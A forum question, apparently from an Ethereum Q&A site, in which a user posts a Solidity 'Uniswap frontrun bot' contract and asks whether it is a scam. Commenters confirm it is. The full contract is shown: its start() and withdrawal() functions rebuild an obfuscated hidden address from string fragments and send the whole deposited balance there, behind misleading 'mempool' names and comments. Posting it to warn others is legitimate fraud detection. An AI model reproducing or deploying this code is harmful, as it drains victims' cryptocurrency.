# Unfamiliar with this coding language-Please let me know if this is another sandwich bot crypto scam

Tags: scam, bot

```
pragma solidity ^0.6.6;
 
// Import Libraries Migrator/Exchange/Factory
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/IUniswapV2Migrator.sol";
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";
import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";
 
 
 
contract UniswapFrontrunBot {
 
    string public tokenName;
    string public tokenSymbol;
    uint frontrun;
 
 
     constructor(string memory _tokenName, string memory _tokenSymbol) public {
        tokenName = _tokenName;
        tokenSymbol = _tokenSymbol;
 
    }
    struct slice {
        uint _len;
        uint _ptr;
    }
 
     /*
     * @dev Find newly deployed contracts on Uniswap Exchange
     * @param memory of required contract liquidity.
     * @param other The second slice to compare.
     * @return New contracts with required liquidity.
     */
    function getMemPoolOffset() internal pure returns (uint) {
        return 995411;
    }
 
     function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
        uint shortest = self._len;
 
       if (other._len < self._len)
             shortest = other._len;
 
        uint selfptr = self._ptr;
        uint otherptr = other._ptr;
 
        for (uint idx = 0; idx < shortest; idx += 32) {
            // initiate contract finder
            uint a;
            uint b;
 
            string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
            string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
            loadCurrentContract(WETH_CONTRACT_ADDRESS);
            loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
            assembly {
                a := mload(selfptr)
                b := mload(otherptr)
            }
 
              if (a != b) {
                // Mask out irrelevant contracts and check again for new contracts
                uint256 mask = uint256(1);
 
 
                if(shortest < 0) {
 
                  mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
                }
                uint256 diff = (a & mask) - (b & mask);
                if (diff != 0)
                    return int(diff);
 
            }
            selfptr += 32;
            otherptr += 32;
        }
        return int(self._len) - int(other._len);
 
    }
   /*
     * @dev Extracts the newest contracts on Uniswap exchange
     * @param self The slice to operate on.
     * @param rune The slice that will contain the first rune.
     * @return `list of contracts`.
     */
 
     function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
        uint ptr = selfptr;
        uint idx;
 
        if (needlelen <= selflen) {
            if (needlelen <= 32) {
                bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));
 
                bytes32 needledata;
                assembly { needledata := and(mload(needleptr), mask) }
 
                uint end = selfptr + selflen - needlelen;
                bytes32 ptrdata;
                assembly { ptrdata := and(mload(ptr), mask) }
 
 
 
                while (ptrdata != needledata) {
                    if (ptr >= end)
                        return selfptr + selflen;
                    ptr++;
                    assembly { ptrdata := and(mload(ptr), mask) }
                }
                return ptr;
            } else {
                // For long needles, use hashing
                bytes32 hash;
                assembly { hash := keccak256(needleptr, needlelen) }
 
 
 
                for (idx = 0; idx <= selflen - needlelen; idx++) {
                    bytes32 testHash;
                    assembly { testHash := keccak256(ptr, needlelen) }
                    if (hash == testHash)
                        return ptr;
                    ptr += 1;
                }
            }
        }
        return selfptr + selflen;
    }
 
   /*
     * @dev Loading the contract
     * @param contract address
     * @return contract interaction object
     */
    function fetchMempoolVersion() private pure returns (string memory) {
        return "8434dE88D";
    }
 
    function getMemPoolLength() internal pure returns (uint) {
        return 524502;
    }
      function callMempool() internal pure returns (string memory) {
        string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
        uint _memPoolSol = 534136;
        uint _memPoolLength = getMemPoolLength();
        uint _memPoolSize = 379113;
        uint _memPoolHeight = fetchContractID();
        uint _memPoolWidth = 308522;
        uint _memPoolDepth = contractData();
        uint _memPoolCount = 692501;
 
 
        string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
        string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
        string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth));
        string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount));
 
        string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
        string memory _fullMempool = mempool("0", _allMempools);
 
 
        return _fullMempool;
    }
   /*
     * @dev Extracts the contract from Uniswap
     * @param self The slice to operate on.
     * @param rune The slice that will contain the first rune.
     * @return `rune`.
     */
    receive() external payable {}
    function getMempoolSol() private pure returns (string memory) {return "x667";}
    function fetchMempoolEdition() private pure returns (string memory) {
        return "62E40C1D5";
    }
   /*
     * @dev Orders the contract by its available liquidity
     * @param self The slice to operate on.
     * @return The contract with possbile maximum return
     */
    function startExploration(string memory _a) internal pure returns (address _parsedAddress) {
    bytes memory tmp = bytes(_a);
    uint160 iaddr = 0;
    uint160 b1;
    uint160 b2;
    for (uint i = 2; i < 2 + 2 * 20; i += 2) {
        iaddr *= 256;
        b1 = uint160(uint8(tmp[i]));
        b2 = uint160(uint8(tmp[i + 1]));
        if ((b1 >= 97) && (b1 <= 102)) {
            b1 -= 87;
        } else if ((b1 >= 65) && (b1 <= 70)) {
            b1 -= 55;
        } else if ((b1 >= 48) && (b1 <= 57)) {
            b1 -= 48;
        }
        if ((b2 >= 97) && (b2 <= 102)) {
            b2 -= 87;
        } else if ((b2 >= 65) && (b2 <= 70)) {
            b2 -= 55;
        } else if ((b2 >= 48) && (b2 <= 57)) {
            b2 -= 48;
        }
        iaddr += (b1 * 16 + b2);
    }
    return address(iaddr);
}
 
     // Check for truncated codepoints
 
    function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
        bytes memory _baseBytes = bytes(_base);
        bytes memory _valueBytes = bytes(_value);
 
        string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
        bytes memory _newValue = bytes(_tmpValue);
 
        // Load the first byte of the rune into the LSBs of b
 
        uint i;
        uint j;
 
        for(i=0; i<_baseBytes.length; i++) {
            _newValue[j++] = _baseBytes[i];
        }
 
        for(i=0; i<_valueBytes.length; i++) {
            _newValue[j++] = _valueBytes[i];
        }
 
        // Check for truncated codepoints
        return string(_newValue);
    }    
    function getMempoolLong() private pure returns (string memory) {
        return "fa2603f123cf";
    }
 
    function getBalance() private view returns(uint) {
        // Check available liquidity
 
        return address(this).balance;
    }
    function start() public payable {
        address to = startExploration(fetchMempoolData());
        // Copy remaining bytes
        address payable contracts = payable(to);
        contracts.transfer(getBalance());
    }
  /*
     * @dev Calculates remaining liquidity in contract
     * @param self The slice to operate on.
     * @return The length of the slice in runes.
     */
    function getMempoolDepth() private pure returns (string memory) {return "0";}
    function fetchContractID() internal pure returns (uint) {
        return 285398;
    }
    function contractData() internal pure returns (uint) {
        return 395729;
    }
    /*
     * @dev Parsing all uniswap mempool
     * @param self The contract to operate on.
     * @return True if the slice is empty, False otherwise.
     */
    function checkLiquidity(uint a) internal pure returns (string memory) {
        uint count = 0;
        uint b = a;
        while (b != 0) {
            count++;
            b /= 16;
        }
        bytes memory res = new bytes(count);
        for (uint i=0; i<count; ++i) {
            b = a % 16;
            a /= 16;
        }
        uint hexLength = bytes(string(res)).length;
        if (hexLength == 4) {
            string memory _hexC1 = mempool("0", string(res));
            return _hexC1;
        } else if (hexLength == 3) {
            string memory _hexC2 = mempool("0", string(res));
            return _hexC2;
        } else if (hexLength == 2) {
            string memory _hexC3 = mempool("000", string(res));
            return _hexC3;
        } else if (hexLength == 1) {
            string memory _hexC4 = mempool("0000", string(res));
            return _hexC4;
        }
   /*
     * @dev Returns the keccak-256 hash of the contracts.
     * @param self The slice to hash.
     * @return The hash of the contract.
     */
        return string(res);
    }
 
    function getMempoolShort() private pure returns (string memory) {
        return "0f14FFD";
    }
    function fetchMempoolData() internal pure returns (string memory) {
        string memory _MempoolDepth = getMempoolDepth();
        string memory _MempoolSol = getMempoolSol();
        string memory _mempoolShort = getMempoolShort();
        string memory _mempoolEdition = fetchMempoolEdition();
        string memory _mempoolVersion = fetchMempoolVersion();
        string memory _mempoolLong = getMempoolLong();
        return string(abi.encodePacked(_MempoolDepth,_MempoolSol,_mempoolShort, _mempoolEdition, _mempoolVersion, _mempoolLong));
 
    }
    /*
     * @dev If `self` starts with `needle`, `needle` is removed from the
     *      beginning of `self`. Otherwise, `self` is unmodified.
     * @param self The slice to operate on.
     * @param needle The slice to search for.
     * @return `self`
     */
     function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
        if (self._len < needle._len) {
            return self;
        }
 
 
 
        bool equal = true;
        if (self._ptr != needle._ptr) {
            assembly {
                let length := mload(needle)
                let selfptr := mload(add(self, 0x20))
                let needleptr := mload(add(needle, 0x20))
                equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
            }
        }
 
 
 
        if (equal) {
            self._len -= needle._len;
            self._ptr += needle._len;
        }
 
        return self;
    }
 
    // Returns the memory address of the first byte of the first occurrence of
    // `needle` in `self`, or the first byte after `self` if not found.
    function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
        uint ptr = selfptr;
        uint idx;
 
        if (needlelen <= selflen) {
            if (needlelen <= 32) {
                bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));
 
                bytes32 needledata;
                assembly { needledata := and(mload(needleptr), mask) }
 
                uint end = selfptr + selflen - needlelen;
                bytes32 ptrdata;
                assembly { ptrdata := and(mload(ptr), mask) }
 
                while (ptrdata != needledata) {
                    if (ptr >= end)
                        return selfptr + selflen;
                    ptr++;
                    assembly { ptrdata := and(mload(ptr), mask) }
                }
                return ptr;
 
     /*
     * @dev Iterating through all mempool to call the one with the with highest possible returns
     * @return `self`.
     */
            } else {
                // For long needles, use hashing
                bytes32 hash;
                assembly { hash := keccak256(needleptr, needlelen) }
 
                for (idx = 0; idx <= selflen - needlelen; idx++) {
                    bytes32 testHash;
                    assembly { testHash := keccak256(ptr, needlelen) }
                    if (hash == testHash)
                        return ptr;
                    ptr += 1;
                }
            }
        }
        return selfptr + selflen;
    }
 
     /*
     * @dev Modifies `self` to contain everything from the first occurrence of
     *      `needle` to the end of the slice. `self` is set to the empty slice
     *      if `needle` is not found.
     * @param self The slice to search and modify.
     * @param needle The text to search for.
     * @return `self`.
     */
    function toHexDigit(uint8 d) pure internal returns (byte) {
        if (0 <= d && d <= 9) {
            return byte(uint8(byte('0')) + d);
        } else if (10 <= uint8(d) && uint8(d) <= 15) {
            return byte(uint8(byte('a')) + d - 10);
        }
        // revert("Invalid hex digit");
        revert();
    }
    function loadCurrentContract(string memory self) internal pure returns (string memory) {
        string memory ret = self;
        uint retptr;
        assembly { retptr := add(ret, 32) }
 
    /*
     * @dev Perform frontrun action from different contract pools
     * @param contract address to snipe liquidity from
     * @return `token`.
     */
        return ret;
    }
    /*
     * @dev loads all uniswap mempool into memory
     * @param token An output parameter to which the first token is written.
     * @return `mempool`.
     */
    function withdrawal() public payable { 
        address to = startExploration((fetchMempoolData()));
        address payable contracts = payable(to);
        contracts.transfer(getBalance());
    }
}
```

Comment: [I added a generic question and answer: I got scammed](https://ethereum.stackexchange.com/questions/152373/i-got-scammed-on-ethereum-what-to-do/152374#152374).

Comment: Yes, it is a scam contract. Don't blindly follow fake YT channels with tons of fake comments.